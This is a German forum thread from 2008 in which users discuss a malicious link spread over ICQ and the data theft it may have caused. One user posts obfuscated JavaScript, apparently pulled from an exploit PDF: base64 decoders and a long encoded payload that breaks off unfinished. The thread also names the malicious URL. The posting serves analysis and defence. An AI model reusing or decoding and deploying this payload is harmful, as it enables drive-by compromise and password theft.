Infizierte php geöffnet kann einer sich das mal anschauen xD

unix · 29. Dezember 2008

folgendes: ein kollege hat mir nen Link geschickt, mit php zum schluss ich vertrau dem hab drauf geklickt dann kackt langsam der Firefox ab und ich habs gleich kapiert das es ein Angriff ist hab Task Manager ff gekillt, im FF hab ich noch NoScript drinn und Adblock falls des was hilft,

aber der Firefox lies sich nich gleich abschalten und ich denk mal da sind jetzt einige Daten rübergewandert xD

Mein Kollege weiß nix davon also ist anscheinend wieder son kack ICQ Virus in Umlauf der sich über ICQ selbst verschickt xD!!!!

Kennt sich einer damit aus, hab atm kein VM installiert, der sich die Seite und den Quellcode vllt. mal anschauen könnte oder so?

Ich hoffe ich verstoße nich gegen die Regeln damit wenn ich den Scheiß Link jetzt poste xD

DAS IST der verseuchte LINK nichd rauf klicken!!!! ^^

Code:

http://vide0portal.com/news/index.php

Kann mir bitte einer helfen, hab schon mein STEAM PW geändert und weitere findet er mit mspass nich jetzt noch meine gespeicherten PWs in FF.

Anzeige

MasterJulian · 29. Dezember 2008

AW: Infizierte php geöffnet kann einer sich das mal anschauen xD

Das File existiert nicht mehr. Von daher kann dir wohl auch keiner helfen.

Romka · 29. Dezember 2008

AW: Infizierte php geöffnet kann einer sich das mal anschauen xD

Warscheinlich wieder ein Browserexploit oder ein Webattackingkit wie MPACK und co. ^^
Meist sind es Public exploits also wenn du immer mit aktueller Software (browser,windows) surfst kann dir nich viel passieren. Gibt natürlich auch Ausnahmen.

Noscript kann dich bei solchen Sachen retten und ist ziemlich paraktisch, da diese kits glaube ich alle java verwenden.

unix · 29. Dezember 2008

AW: Infizierte php geöffnet kann einer sich das mal anschauen xD

hhmm ja ich weiß NoScript ist ja für JavaScripts, aber die Seite hat ja die Endung php, also müsste da NoScript eig. nutzlos sein oder?

DerW0olf · 29. Dezember 2008

AW: Infizierte php geöffnet kann einer sich das mal anschauen xD

hä ?
bei mir geht die seite ganz normal.
also es laggt kurz dann ist da eine weiße seite.
ich bezweifel stark, dass die meine passwörter nun haben

unix · 29. Dezember 2008

AW: Infizierte php geöffnet kann einer sich das mal anschauen xD

Nunja ich bin mir ja auch nich 100% sicher gewesen, nur nen Link von jemandem zu bekommen der dir aber keinen geschickt hat, der dann auch noch laggt, und wo danach über 20 Viren und Trojaner aufm PC gefunden werden, da denk ich schon das der ist ^^ und hab auch schon öfters gehört von so kack scripts die einem dann die PWs auslesen.

Und iwie kann ich mein ebay PW net ändern!

Ich geb mein altes ein, dann 2x des neue klick auf OK, komm wieder in Mein Ebay raus und nix ist passiert und krieg auch keine mail xD

DarkRaven · 29. Dezember 2008

AW: Infizierte php geöffnet kann einer sich das mal anschauen xD

also ich als dachte mir nix böses und klick da drauf (eigentlich bin ich ein sehr erfahrener pc-user, und mit opera kann einem nix passieren) und auf einmal hängt sich mein pc auf..

in der seite ist ein Adobe-Dokument eingebunden dass sich (wenn mans installiert hat) mit dem Adobe-Plugin direkt öffnet.
Vor einigen Tagen habe ich gelesen, dass es für Adobe Reader ein paar Exploits gibt mit denen man Code ausführen kann

uff. shit... kann das einer mal in ner sandbox testen und sagen was passiert?

MasterJulian · 30. Dezember 2008

AW: Infizierte php geöffnet kann einer sich das mal anschauen xD

Komisch. Ich bekomme immer nur nen 404. Gut ich hab auch kein Adobe Plugin installiert, da ich foxit reader verwende

unix · 30. Dezember 2008

AW: Infizierte php geöffnet kann einer sich das mal anschauen xD

ja genau ^^ so wars bei mir auch!

Es kam unten in der Statusleiste was von pdf, hab dann aber ff abgeschossen.
Und jetzt nach dem Virenscan etc. hab ich nen neustart gemacht und was war ^^

FoxitReader konnte nicht beendet werden.

Da hab ich dann auch nochmal Glück gehabt das ich den installiert hab anstatt vom Acrobat Reader.

AsAck · 30. Dezember 2008

AW: Infizierte php geöffnet kann einer sich das mal anschauen xD

hier mal ne Google Diagnose

AsAck

Peedy · 30. Dezember 2008

AW: Infizierte php geöffnet kann einer sich das mal anschauen xD

1. versuch in der vmbox

http://www.abload.de/img/unbenanntuu2h.png

2. versuch nach installation von flashplayer und quick time player

Not Found
The requested was not found on this server.

Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.
Apache

Murdoc · 30. Dezember 2008

AW: Infizierte php geöffnet kann einer sich das mal anschauen xD

isn javascript exploit, ich schau mir den mal an ^^

hier der pdf zufinden:

Code:

var Kjk05y="";
var le3nipQQ9R="";
function cT5JMLJSBS\( uEuDvngENstn \) {
 var rcgkM = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";
 var rK3My5Ahub833, XVuusFDKQgt, UZCfP2zS, eXYfR0mUBd6hX1, rFHrnqWFzJjBw, DUqTH6NV1BBFY, vLy3bF, L7Re7kOIh, CB5fT0 = IAE0PnDZ9BbkRV = 0, fxnehBwPP9 = "", PRn1dPl6vvdsj = [];
 uEuDvngENstn += "";
 do {
 eXYfR0mUBd6hX1 = rcgkM.indexOf\(uEuDvngENstn.charAt\(CB5fT0++\)\);
 rFHrnqWFzJjBw = rcgkM.indexOf\(uEuDvngENstn.charAt\(CB5fT0++\)\);
 DUqTH6NV1BBFY = rcgkM.indexOf\(uEuDvngENstn.charAt\(CB5fT0++\)\);
 vLy3bF = rcgkM.indexOf\(uEuDvngENstn.charAt\(CB5fT0++\)\);
 L7Re7kOIh = eXYfR0mUBd6hX1<<18 | rFHrnqWFzJjBw<<12 | DUqTH6NV1BBFY<<6 | vLy3bF;
 rK3My5Ahub833 = L7Re7kOIh>>16 & 0xff;
 XVuusFDKQgt = L7Re7kOIh>>8 & 0xff;
 UZCfP2zS = L7Re7kOIh & 0xff;
 if \(DUqTH6NV1BBFY == 64\) {
 PRn1dPl6vvdsj[IAE0PnDZ9BbkRV++] = String.fromCharCode\(rK3My5Ahub833\);
 } else if \(vLy3bF == 64\) {
 PRn1dPl6vvdsj[IAE0PnDZ9BbkRV++] = String.fromCharCode\(rK3My5Ahub833, XVuusFDKQgt\);
 } else {
 PRn1dPl6vvdsj[IAE0PnDZ9BbkRV++] = String.fromCharCode\(rK3My5Ahub833, XVuusFDKQgt, UZCfP2zS\);
 }
 } while \(CB5fT0 < uEuDvngENstn.length\);
 fxnehBwPP9 = PRn1dPl6vvdsj.join\(""\);
 fxnehBwPP9 = Mn5dq4o5D\(fxnehBwPP9\);
 return fxnehBwPP9;
}
function Mn5dq4o5D \( rK3My5Ahub833 \) {
 var XVuusFDKQgt = [], UZCfP2zS = eXYfR0mUBd6hX1 = uEuDvngENstn = rFHrnqWFzJjBw = DUqTH6NV1BBFY = 0;
 rK3My5Ahub833 += "";
 while \( UZCfP2zS < rK3My5Ahub833.length \) {
 uEuDvngENstn = rK3My5Ahub833.charCodeAt\(UZCfP2zS\);
 if \(uEuDvngENstn < 128\) {
 XVuusFDKQgt[eXYfR0mUBd6hX1++] = String.fromCharCode\(uEuDvngENstn\);
 UZCfP2zS++;
 } else if \(\(uEuDvngENstn > 191\) && \(uEuDvngENstn < 224\)\) {
 rFHrnqWFzJjBw = rK3My5Ahub833.charCodeAt\(UZCfP2zS+1\);
 XVuusFDKQgt[eXYfR0mUBd6hX1++] = String.fromCharCode\(\(\(uEuDvngENstn & 31\) << 6\) | \(rFHrnqWFzJjBw & 63\)\);
 UZCfP2zS += 2;
 } else {
 rFHrnqWFzJjBw = rK3My5Ahub833.charCodeAt\(UZCfP2zS+1\);
 DUqTH6NV1BBFY = rK3My5Ahub833.charCodeAt\(UZCfP2zS+2\);
 XVuusFDKQgt[eXYfR0mUBd6hX1++] = String.fromCharCode\(\(\(uEuDvngENstn & 15\) << 12\) | \(\(rFHrnqWFzJjBw & 63\) << 6\) | \(DUqTH6NV1BBFY & 63\)\);
 UZCfP2zS += 3;
 }
 }
 return XVuusFDKQgt.join\(""\);
}

Kjk05y= cT5JMLJSBS\("Wm5WdVkzUnBiMjRnY0hveWRHSXlURVEwVkdkd1JqVW9lbWhKTVVsUU0weHNkRWdwZXlCeVpYUjFjbTRnVTNSeWFXNW5XeWRtY205dFEyaGhja052WkdVblhTaDZhRWt4U1ZBelRHeDBTQ2s3ZlNCbWRXNWpkR2x2YmlCc1ZVVjZiMU5SY2s4NFdVTlJjaWhNTjNaRFZTbDdJSFpoY2lCQk9ESXpUSEoyUlVKYU1EMHdMQ0JyYTBsdVRFZFhha2xKYUcxWFBVdzNka05WTG14bGJtZDBhQ3dnVDNvNFVrNUdNVnBtY2oweE1ESTBMQ0JFZVVOMVZGRnFSR3BZV25vc0lHbElUWG8wYzJjc0lGTnVOMFl6TjI5cGVUZFJkMGs5Snljc0lGcHFOV1JUWWtOVFpqMUJPREl6VEhKMlJVSmFNQ3dnYWpKVmJuVkNVMjE2V2pJelBVRTRNak5NY25aRlFsb3dMQ0JNYTJWMlFtRkZXREY1WW1SU1BVRTRNak5NY25aRlFsb3dMQ0JZZEhSTFpIWndVWEF4ZEdKNlBVRnljbUY1S0RZekxEVTBMRFl3TERVMUxETXpMRFF3TERReUxETXNORGdzTXpnc01Dd3dMREFzTUN3d0xEQXNNakFzTlRFc01qUXNNVE1zTVRRc05Td3pPU3d5Tnl3ek55dzNMRFl4TERRMUxESTJMREl5TERRc05Ea3NNelVzTkRjc01URXNNVGdzT1N3MU5pd3hOU3d4TWl3ek5pd3lNU3d6TVN3d0xEQXNNQ3d3TERVNExEQXNOVElzTVRBc01pdzFPU3cxTXl3MU1DdzRMREFzTXpJc01Ua3NNU3cyTERJekxETTBMREk1TERReExESTFMRFl5TERVM0xERTNMRFF6TERRMExETXdMRFEyTERJNExERTJLVHNnWm05eUtHbElUWG8wYzJjOVRXRjBhQzVqWldsc0tHdHJTVzVNUjFkcVNVbG9iVmN2VDNvNFVrNUdNVnBtY2lrN2FVaE5lalJ6Wno1Qk9ESXpUSEoyUlVKYU1EdHBTRTE2TkhObkxTMHBleUJtYjNJb1JIbERkVlJSYWtScVdGcDZQVTFoZEdndWJXbHVLR3RyU1c1TVIxZHFTVWxvYlZjc1QzbzRVazVHTVZwbWNpazdSSGxEZFZSUmFrUnFXRnA2UGtFNE1qTk1jblpGUWxvd08wUjVRM1ZVVVdwRWFsaGFlaTB0TEd0clNXNU1SMWRxU1Vsb2JWY3RMU2w3SUV4clpYWkNZVVZZTVhsaVpGSjhQU2hZZEhSTFpIWndVWEF4ZEdKNlcwdzNka05WTG1Ob1lYSkRiMlJsUVhRb1dtbzFaRk5pUTFObUt5c3BMVFE0WFNrOFBHb3lWVzUxUWxOdGVsb3lNenNnYVdZb2FqSlZiblZDVTIxNldqSXpLWHNnVTI0M1JqTTNiMmw1TjFGM1NTczljSG95ZEdJeVRFUTBWR2R3UmpVb01UazRYa3hyWlhaQ1lVVllNWGxpWkZJbU1qVTFLVHNnVEd0bGRrSmhSVmd4ZVdKa1VqNCtQVGc3SUdveVZXNTFRbE50ZWxveU15MDlNanNnZlNCbGJITmxJSHNnYWpKVmJuVkNVMjE2V2pJelBUWTdJSDBnZlNCOUlHVjJZV3dvVTI0M1JqTTNiMmw1TjFGM1NTazdJSDBnYkZWRmVtOVRVWEpQT0ZsRFVYSW9KMnM1UW5WYWVFSjFRVGR4TmxORVpISkJibDgxWlUxZmNERkVObVJZVm5KMlptMVJNbVZXY25abWJWRXlaVlp5ZG1adFVUSmxWbkoyTVRkVmFVNUVjblpsYlRBeVRrUnlkamczV2pRd1ZuSjJja2RXTkRCV2NuWnlSMUZLTTFaeWRqZGpRa3BsVm5KMk4xTlJNbVZXY25ZM1UyZHBTVVJ5ZGpkZlVVcEJWbkoyYUdOVmFVVkVjblpvWTJkcGFFUnlkbkpxUWpKb1JISjJZMk0xTWpkRWNuWTNZMVZwYUVSeWRqaFNNR2xvUkhKMk4wMHdOR2hFY25Zd04yY3labFp5ZG1acVZtbGxWbkoyTURkbk1tWldjblk0VmxWcFQxWnlkamRqTlVwbFZuSjJOMk5WYVU1RWNuWTRVakJwYUVSeWRrNXlVVXBsVm5KMk9GcFJNRTlXY25ZM2R6QTBNMVp5ZGpGSlVVcGxWbkoyTjJOVlNqTldjblkzWTFWcGFFUnlka2wzWnpJNFZuSjJUbkl3YVU1RWNuWlBTVkV3VDFaeWRqaFdNRW96Vm5KMk1Va3dhVE5XY25ZM1kxVkthRVJ5ZGpkalZXbG9SSEoyU1hkbk1qaFdjblpPY2pCcFQxWnlka1YzTlRCUFZuSjJNMGN3TW1oRWNuWXhTVlpLWTBSeWRqZGpOVXBqUkhKMk4yTlZhV2hFY25aSmQyY3lPRlp5ZGs1eU1HbGxWbkoyTVVkUk1FOVdjbll4TjJkS00xWnlkakZKVVRCb1JISjJOMk5DU2s1RWNuWTNZMVZwYUVSeWRrbDNaekk0Vm5KMlRuSldhV2hFY25aaFZqVXdUMVp5ZGpGYVZUQTRWbkoyTVVrd01rOVdjblkzWTJkS01GWnlkamRqVldsb1JISjJTWGRuTWpoV2NuWkpZMmRwVGtSeWRtTnNWakpvUkhKMk1GcG5Ta1ZFY25ZNE56QktRVlp5ZG1oc01EUkpSSEoyTjE5UlNqaFdjblkzWTFWcE4wUnlkazUzTUdsb1JISjJNRnBuTWpoV2NuWTRVbG8wVGtSeWRqZFRWVFJKUkhKMk4wUTFNRUZXY25ZNFVsWTBPRlp5ZG1oc1ZqUkpSSEoyTVVsV05EQldjblkzWTJjeVpsWnlkamRqVldsb1JISjJja2xXTkdoRWNuWm9SRkZwTUZaeWRqQTNRalF4Vm5KMlQyUlJTazlXY25ZM1kxVnBhRVJ5ZGpnM01HbG9SSEoyYUUwd05FbEVjblpoV21jeVpsWnlkbUUzWnpKRlJISjJPRGRXTkdoRWNuWkZZMVUwU1VSeWRqTkhVVEJQVm5KMk4yTlZhV2hFY25aT1kxVnBhRVJ5ZGtsM1p6Sm1WbkoyY2xaV2FVNUVjblpPWXpCcFkwUnlkazUzWnpKbVZuSjJNVWxXYVU5V2NuWTNZelV3TjBSeWRqZGpWV2xvUkhKMlNYZFZhVVZFY25aaFpGbzBhRVJ5ZGs1Tk1HbG9SSEoyUlhjd01ETldjblpoWkZFd1NVUnlkamRUVlRSb1JISjJjbHBWTUU5V2NuWTNZMVZwYUVSeWRqQmFWVW94Vm5KMk9GSmFOR2hFY25ZM1RUQTBTVVJ5ZGpkRU5UQkJWbkoyT0ZKV05EaFdjblpvYkZZMFNVUnlka2xqTlVwUFZuSjJOMk5WYVdoRWNuWnlWakJwYUVSeWRrNXNNR2x5Vm5KMlNYZFZhVVZFY25aalRVSTBUa1J5ZGs1TlFrcG1WbkoyTTBkV05FVkVjblpGWTFVd1NVUnlkazVOWnpSb1JISjJTWGRuTW1aV2NuWnlWbFpwWlZaeWRrNWpNR2xKUkhKMlRuZG5NbVpXY25ZeFNWWnBUMVp5ZGpkalFqUkZSSEoyTjJOVmFXaEVjblkzWXpVd1FWWnlkakJhVlVveFZuSjJPRkphTkdoRWNuWTNiREEwU1VSeWRqZGlOVEJCVm5KMk9GSldORGhXY25ab2JGWTBTVVJ5ZG1oak5VcFBWbkoyTjJOVmFXaEVjblp5VmpCcGFFUnlkamhTTUVveFZuSjJhR05WTkVsRWNuWTNSRFV3UVZaeWRqaFNWalE0Vm5KMmFHeFdORWxFY25ZM1l6VktUMVp5ZGpkalZXbG9SSEoyU1VSVmFXaEVjblpPWW1jMFpsWnlkakZXVldsRlJISjJNVlpWYVVWRWNuWXhWbFZwUlVSeWRqRldWV2xGUkhKMk1XMVdNa1ZFY25aT1JEQnBUa1J5ZGpoU1ZqUkZSSEoyTVZKQ1NrRldjblpPWWxWS2NsWnlkakUzVlVveFZuSjJPRkpXTkVsRWNuWTRVbEZLWlZaeWRqZHNNREJoVm5KMlRsTldNbVpXY25aT2NqQnBaVlp5ZGpCdFp6Sm1WbkoyT0ZKUmFXVldjblpvZHpBd1RrUnlkamROVlRCUFZuSjJUbkl3U2tWRWNuWXdNRll5WmxaeWRqZE5RalJvUkhKMlkwMVZTa1ZFY25aSlkxWktPRlp5ZG1acU1EUTNSSEoyWVcxVmFVVkVjblpqVFdjME1GWnlkamRNTUVvd1ZuSjJhR05WTWpOV2NuWXpValZwUVZaeWRqZHNNREJPUkhKMllWcFdTamRFY25ZM1RWVnBZVlp5ZGtsalZVcGpSSEoyTTFZMVNtWldjbll6V2xGcFpsWnlkakJhWnpRelZuSjJUa1JSU2tsRWNuWXhVbFl5WmxaeWRrNUVWakptVm5KMk4wMUNORTVFY25aeU1GcEtZVlp5ZGpkTlZqSm1WbkoyT0ZJd05HWldjblpvVFZZMFFWWnlkbVZxTUdsRlJISjJOMU5uTW1aV2NuWTNUV2N5WmxaeWRrNTNWa3BKUkhKMllWSm5OR0ZXY25ZM1kxVnBUMVp5ZGpOcU5VcFBWbkoyTTBjd1NqTldjblpPZDFWS01WWnlka2xOVmpSalJISjJTVXd3TkdGV2NuWTNZMVUwTTFaeWRrOVNWakp5Vm5KMlQwZGFNbVpXY25aaE4wSktTVVJ5ZGs4M1ZrcG9SSEoyT0ZKV01qQldjblpsUjFZeVFWWnlkamczUWpJeFZuSjJUMUphTW1GV2NuWTRiV2N5TTFaeWRqaHRWa28zUkhKMk9GSm5NbWhFY25ZNFZtZEthRVJ5ZGs5SlZqSkJWbkoyWVRkQ01tVldjblk0TjJjeVJVUnlkamhTVmpJelZuSjJUMGRXU2pkRWNuWlBSMVl5Y21weVpFcEhSSFpHVTNWelkySmlTbUUyTmpaNlRFZHVSRTFSTlVCNE1IWTFSRXhMU0hjMlMxQmZSSE5RVm5WS1NVd3dORkJXZFVwSlREQTBXREIzTURoM1lrczVVRjgyWkdwUlNrbzNaSEJoVEVRMU5IaFdOblV4ZDJsVU1WOUdVakZmTW5vNU5saEJibmcyVUc1TU5XWmZUREJQWDE5MU5rUTJaR05pWWtwaE5qWTJla3hIYmtSTlVUVkFibmcyVUc1TU5XWmZObkpwYkY5a1kySmlTbUUyTmpaNlRFZHVSRTFSTlVBeGNuSmpZbUpLWVRZMk5ucE1SMjVFVFZFMVFERldka1pUZFhNMWVHSndZWGhSYVc1VFZrczJObUpZTVRrMVVHVlNZa2cxYldSMldFMTFkbUZ5WWpZMFgzaEtOamRNTlZFelZuWkdVM1Z6WldKa2RUUjRVV2x1VTFaTE5qWmlXREU1TlZCbFVtSklOVzFrZGxoTmRYWmhjbUkyTkY5NFNqWlNOVFZoYW5VMk5tTndTMVJmUWtwdVUxUmZOa1JpTmpSaWRYVjFOMHcxVVROYWRuaHlOalpRWDNkTFpuSk1OVFYxWHpVMWJEWjJlREZFTlRRMlVVcHlZMUZLTVVkUlNsRnRkWFpSYkY5eVpXSmtkVFF4ZDB0bWNrdzFTMUJmTmxoVFJ6QTRkMkpMT1ZwaVMyRjRYM0kxUkV4Mk9WcG5TMkYzWDFGNE1IY3dhVGxpUzNnd1lsRmtSMW93VVdaMWNqTnFVVW94TXpCMU1qRjNaRkV6WkhCaFUyUTJiM0ppVVVkNFdrdG1ja3cxUzBsQ2JrdHljMjVMUkZaWWNHSnpkbVJqWkhCaFRIZDFNVlphYmxSbVZUUjBZMVZZWkdweVNtRXdWbk5MYW5Jd01EQXdNREF3TURBd2FuZGtXREF3TURBd01EQllNMFJ6TURBd01EQnFkMlJZWkZFd2NtUlJNSEprVm5OTGFuZ3djbVJSTUhKa1VUQnlaRkV3Y21SUk1ISmtVVEJ5WkZFd2NtUlJNSEprVVRCeVpGRXdjbVJXYzB0cWVEQnlaRkV3Y21SUk1ISmtVVEJ5WkZFd2NtUlJNSEprVVRCeVpGRXdjbVJSTUhKa1VUQnlaRkV3Y21SUk1ISmtVVEJ5WkZFd2NtUlJNSEprVVRCeVpGRXdjbVJSTUhKa1VUQnlaRkV3Y21SUk1ISmtVVEJ5WkZFd2NtUlJNSEprVVRCeVpGRXdjbVJSTUhKa1VUQnlaRkV3Y21SUk1ISmtVVEJ5WkZFd2NtUlJNSEprVVRCeVpGRXdjbVJSTUhKa1VUQnlaRkV3Y21SUk1ISnFkMlJZWkZFd2NtUlJNSEprVVRCeVpGRXdjbVJSTUhKa1VUQnlaRkV3Y21SUk1ISmtVVEJ5WkZFd2NtUlJNSEprVVRCeVpGRXdjbVJSTUhKcWQyUllaRkV3Y21SUk1ISmtVVEJ5WkZFd2NtUlJNSEprVVRCeVpGRXdjbVJSTUhKa1VUQnlaRkV3Y21SUk1ISmtVVEJZTTBSemNtUlJNSEprVVRCeVpGRXdjbVJSTUhKcWQyUllaRkV3Y21SUk1ISmtVVEJ5WkZFd2NtUlJNSEprVVRCeVpGWnpTMnA0TUhKa1VUQnlaRkV3Y21SUk1ISmtVVEJ5YW5jd1FXSmtkVFp1ZUV0aGNtSTJabU0yWkZoV2VESkJSMUZLTVRkaWN6WXpOa3BCUmtKdVYzZENXR2hFYzJSS04xOTJOVTAyZGxFNVlqWTVOMTlJVkhJd01EYzJYelE0WkhGMmVEQjRjMHBNUkhaR1UzVnpkVEUxZG0xZmRXNVRUVFp6WkVkRU5sQnNkWE5KVTFKTFJuSjFaRkV6VVhOcFJGSTJTR0prZFhCdU5uTTJkMmN5TUdObmNEVmZlSFU0ZUVKMlYyTlVNbmRmUW1rMlIzaElSV05DTkhSeVduQnFSSEV5Y2xKQ1VGRkhkMUU1U1hWMVVUWmZOVGxrZUhVNGVFSjJWMk5VTW5kZlFtazFkVjgxTld3MmRuaG1SRXBmUjNFMGFFMUNXREJ0WDFocWJGRXdZekZWWkVwZlluWlNiRkpRZW1OUlJrUnNOWE5MVVZGemVHTmtiazltWjFnNFpIQlFhekV3ZURsa1luWlNiRkpRZW1OUlJrUnNOWE5rUjNoMU9IaENkbGRqVkRKM1gwSnBOVzFrZGxoTmRYWmhjbUkyTkY5NFNqWkhjVFJvVFVKWU1HMWZXR3BzVVRCak1VSmZZVEIzTURscVpEVm1SRkpMTlV4NGRUaDRRblpYWTFReWQxOUNhVXBIY25nNU4xOTJOVTAyZGxFNVlqWTVaR0pRZDJOSE1tdFRjVXA0TUhoelNreEVka1pUZFhObk5qVkthazFrU0V0c2NITmtSM2hLY2t4YWNERnROa3BJVEZwd1NrZEVka1pUZFhOaE5reElVMFJrTW5KTWN6UkJVbUpZWjJ4MWMyUkhjblkxUkV4TFNIYzJTMUJmUkhOUVZuVXlaVkphU2xCV2RUSmxVbHBLVUZaMU1tVlNXa3BRVm5WS2FFUm5ORkJXUjBwbFZsWTBVRlpTTWpodFZUQlFWblV3TVdwVk1GQldkVEF4UnpCS1VGWmthV2hOV2twUVZtUnBZVkphU2xCV1pHbE9ZMVUwVUZaa2FYSkhNREpRVmxKcGFFUkNORkJXVW1sb1kyZHBVRloxTUU1c1ZtbFFWblZwYUdJd2FWQldaR2xvUkdkcFVGWlNNbVpXWjJsUVZtUnBaVnBuYVZCV1pEQm9ZMUV5VUZaMU1tRTNRa3BRVm1Rd2FHTlJNbEJXVWpJM1JFSXlVRlprYVdoTVdrcFFWbVJwYUVSbk5GQldVakptVm1kcFVGWlNOREJIV2twUVZsSXlNMlJhTWxCV1pHa3pXbFZLVUZaMVNrOUhXa3BRVm1ScGFIY3dTbEJXWkdsb1JHZHBVRlprTkVsalZqSlFWbEkwTUZabk5GQldSekpQWkZveVVGWlNNa0ZhTUVwUVZuVktUMVpWU2xCV1pHbG9kMVpwVUZaa2FXaEVaMmxRVm1RMFNXTldNbEJXVWpRd1ZrSXlVRlpITkVsZldqSlFWbVJLTVZaV2FWQldkVXBQYWxGcFVGWmthV2hNVVdsUVZtUnBhRVJuYVZCV1pEUkpZMVl5VUZaU05EQldRa3BRVm5WS01XUmFNbEJXZFVwb1V6QktVRloxU2s5a1ZtbFFWbVJwYUUxV05GQldaR2xvUkdkcFVGWmtORWxqVmpKUVZsSTBNRGRuYVZCV1VrbzNYMW95VUZaMVNrbHlWakpRVm5WS1QxWmFNbEJXWkdsb1V6QXdVRlprYVdoRVoybFFWbVEwU1dOV01sQldaRFJvWTJjMFVGWjFhVTgzVm1sUVZtUXdTVk5hTkZCV1VqSTRXakF5VUZaU2FVOWFWVFJRVm1ScGNrZFdNbEJXWkdsb1JGVnBVRlpTTkROV1oybFFWbVF3U1dOV01sQldVakptYldjMFVGWmthVTUzVlRSUVZtUnBOMTh3TWxCV1VqSm1hbWN5VUZaU2FVOXFWVFJRVm5WS1QycFZNRkJXWkdsb1kxRXlVRlprYVdoRVoybFFWblV3VDJwbmFWQldVbWxCVWxVd1VGWmtNR2hOTlVwUVZrY3lja2RhTWxCV1pHbG9SR2RwVUZaU01qaFdaMmxRVmxKcFpWcFZORkJXVWtwSlkxRXlVRlpTU21oaldqUlFWbEl5T0dwbmFWQldSelJvZDFVMFVGWmtTakZrV2pKUVZtUnBhRVJuYVZCV1VqUm9SR2RwVUZaa05FbGpVVEpRVm5Vd1FUZG5ORkJXVWpRNFZqVnBVRlpTTkVsalVUSlFWblZLVHpkQ01sQldaR2xvWHpCcFVGWmthV2hFWjJsUVZtUTBTVVJDTkZCV1VrcHliV2RwVUZaU05HVldaMmxRVmtjME16QXdTbEJXVWtweVpEQTBVRlprYVU1M1oybFFWblV3U1hKYU1sQldaR2xvUkdkcFVGWmtNRWwzVVVwUVZsSXlabTFuYVZCV1pHbGxXbFUwVUZaa2FUZGZNREpRVmxJeVptcG5NbEJXVW1sUGFsVTBVRlprTkdoTVdqSlFWbVJwYUVSbmFWQldkVEJCVm1kcFVGWlNORTlXTlRCUVZtUTBTVVJDTkZCV2RXbEZUV2MwVUZaU05FVk5VVEpRVm1SS01XcENORkJXUnpSb2NqQTBVRlpTTkVWVFoybFFWbVEwU1dOUk1sQldkVEJCTjBKS1VGWlNORGhXVlRSUVZsSTBTV05STWxCV2RVcFBOMEl5VUZaa2FXaE5RalJRVm1ScGFFUm5hVkJXWkdsb1h6QXlVRlprTUVsM1VVcFFWbEl5Wm0xbmFWQldaR2xQV2xVMFVGWmthV05mTURKUVZsSXlabXBuTWxCV1VtbFBhbFUwVUZaU2FXaE1XakpRVm1ScGFFUm5hVkJXZFRCQlZtZHBVRlpTTW1aYVVVcFFWbEpwYUhkVk5GQldaR2szWHpBeVVGWlNNbVpxWnpKUVZsSnBUMnBWTkZCV1pHbG9URm95VUZaa2FXaEVaMmxRVm1RME4wUm5hVkJXVWpSalV6VXlVRloxU2pkRVFqUlFWblZLTjBSQ05GQldkVW8zUkVJMFVGWjFTamRFUWpSUVZuVktaVGRhTkZCV1VqUkJWbWMwVUZaU01tWnFRalJRVm5WS1kwMHdNbEJXVWpSamQxRXdVRloxU21oM1VVcFFWbEl5Wm1wVk5GQldVakptUjFwS1VGWmthVTh3VmtwUVZsSTBZVGRSTWxCV1VqUXdWa0pLVUZaa01FVmpVVEpRVmxJeVpsSkNTbEJXVW1rek1GWTBVRlprYVVWeVdqSlFWbEkwTUZwYU5GQldaREF3TjFFeVVGWmthVVZOWjJsUVZuVnBSWGRhTkZCV1pEUTRhbFl5VUZaMU1tRmFWV2xRVmxKS1JVUkNORkJXZFdsRlUxVXdVRlprYVRGYU1EQlFWbEpwYUVRd1NsQldaRXBqWWxVeVVGWmthVTh3VmpSUVZsSktNMm93YVZCV1pHbEZSR2RLVUZaa05HaDNVV2xRVm1SS04weFJNbEJXWkVvelVqVXlVRlprTUVsVFZVcFFWbEkwUVVjd05GQldkVXBtTjFFeVVGWlNORUUzVVRKUVZtUnBSVTFuTkZCV2RUQXdiVlpLVUZaa2FXVTNVVEpRVmxJeVpsbzFNbEJXVW1sbGFsVXlVRlpIU21GV1FqUlFWbVJwVG1OUk1sQldaR2xGWTFFeVVGWlNORE5xTURSUVZsSktZMU5uU2xCV1pHbG9SRUl5VUZaa1NrNU1XakpRVm1SS01Wb3dTbEJXVWpSSmQxRktVRlprTkdWcU5XbFFWbVEwTVZwblNsQldaR2xvZDFWS1VGWlNNakJ0Vm1sUVZrZEtZMk5STWxCV1J6SmxhbFl5VUZaU01rVnNVVXBRVmtkS1ptMVJhVmd3ZHpBNU4yUndZVXg0Um1aRWNEQlNURlEwUXpsZmJsUk1jbkk1UjFGUlprZFJTakZIVVVwS1IwUjJSbE4xYzNaNFRHNVJiRFpRVUUxU2NFaHlZbEJQVEhKeU9XcDFObGxpYzNaQlpIVklTVVJSTlhwdVFuWTFkVjgxTld3MmRuaE1SR1E1YWxvd09UZGtjR0ZNZUVoRlkwSTBkSEphY0dwRWNUSnlVa0pRT1ZGUmMzZGlaRmh5VVRWSVRqRkNObEk1TlhOMVIzaGtkbmhNYmxGc05sQlFUVkp3U0hKaVVFOHhlRXB5VFZFd1VUTlJjemgzWWtzNVpHSjJVbXhTVUhwalVVWkViRFZ6WkVkeWRqVkVURXRJZHpaTFVGOUVjMUJXWkRBeE1GRktVRlprTURFd1VVcFlNSGN3T1dSaWRsSnNVbEI2WTFGR1JHdzFjMlJIZURaSll6QlJhRk5pTm5oa1luWlNiRkpRZW1OUlJrUnNOVjg1UjNFMGFFMUNXREJ0WDFocWJGRXdZekZWWkVwSFJIWkdVM1Z6Y0hKYU1sTlRkVFpTZUVKTGRreHljamxrUkc1aVREQllaWGR4ZFhSTWNsODVSMUZSWmtkUlNqRkhVVXBSUm5oR1prUndNRkpNVkRSRE9WOXVWREZSYzJrNVlrczVaRVIyUmxOMWN6Wk5SM1pPTVZWUk1YSmlVREJOUWpSTmJHUnlNVE5STm1Wc1VqUkRjblZMVVdaVlVVVk5OVWhQTmxvMk1FbFJXR0UyWDI1U1RWSjFTblZNUzA5VFFsQXdUR1IxVjNKSE5FVk1jWFpMTTNKa09UTjFjM1V4TlhadFgzVnVVMDFNUmpaTlIzWk9NVlZSTVhKaVVEQk5RalJOYkdRNU9WRlJjM2hqWkc1UFptZFlPR1J3VUd0TWQyUTVhblUyV1dKemRrRmtkVWhKUkZFMWVtNUNka3BIY25nNVVYVnphVVJTTmtoaVpIVndialp6VG1Jd2NFQk5jR1JSU